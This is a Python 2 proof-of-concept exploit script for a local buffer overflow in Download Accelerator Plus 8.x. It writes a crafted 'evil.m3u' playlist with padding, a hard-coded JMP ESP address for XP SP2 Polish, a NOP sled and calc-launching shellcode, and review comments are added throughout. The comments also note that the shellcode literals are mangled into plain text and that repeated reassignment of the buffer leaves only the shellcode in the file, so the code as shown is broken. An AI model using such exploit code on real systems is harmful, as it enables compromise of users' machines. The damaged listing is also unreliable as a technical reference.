#!/usr/bin/python
# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##
from struct import pack
# Proof-of-concept generator: writes a playlist file (evil.m3u) containing one
# crafted URL entry for the DAP 8.x m3u parsing overflow named in the header.
# Python 2 script (print statement, str written to a binary file handle).
#
# Payload string; the file header describes it as a Windows "execute command"
# payload that launches calc.
# NOTE(review): as shown on this page the literals hold plain "x6a"-style text
# rather than raw bytes, so this listing looks damaged by extraction and is not
# a faithful copy of the original script.
shellcode = (
"x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6"
"xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7"
"x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58"
"x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae"
"x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60"
"xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf"
"xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70"
"x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33"
"xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04"
"x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2")
# Hard-coded address inside one specific SHELL32.DLL build (see the trailing
# comment), which ties the PoC to that OS version and language pack.
# NOTE(review): a fixed address like this presumably only holds where the
# module loads at a constant base and the stack is executable, i.e. without
# ASLR and DEP -- confirm against the platform being assessed.
RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
# Playlist entry template: an http URL whose file-name part receives the
# oversized data through the %s placeholder.
m3u = 'http://localhost/verify_me________________________________%s.mp3'
# The next four statements each rebind buf, so as written only the last value
# (shellcode) is substituted into the template.
# 14074 filler characters -- presumably the author's measured padding length
# for DAP 8.6; not verifiable from this page.
buf = 'A' * 14074
# Little-endian 32-bit encoding of RET.
buf = pack('<L', RET)
buf = 'x90' * 32
buf = shellcode
m3u %= buf
# Write the single-entry playlist to the current directory.
# Defensive indicator: an .m3u entry far longer than any real URL, or one
# carrying non-printable bytes, is what file scanners and gateways can flag.
fd = open('evil.m3u', 'wb')
fd.write(m3u)
fd.close()
# The message shows the trigger needs user interaction: the playlist has to be
# imported into DAP and "Verify" clicked, so this is a local file-format issue.
print 'DONE, import the evil.m3u and click "Verify"'
# EoF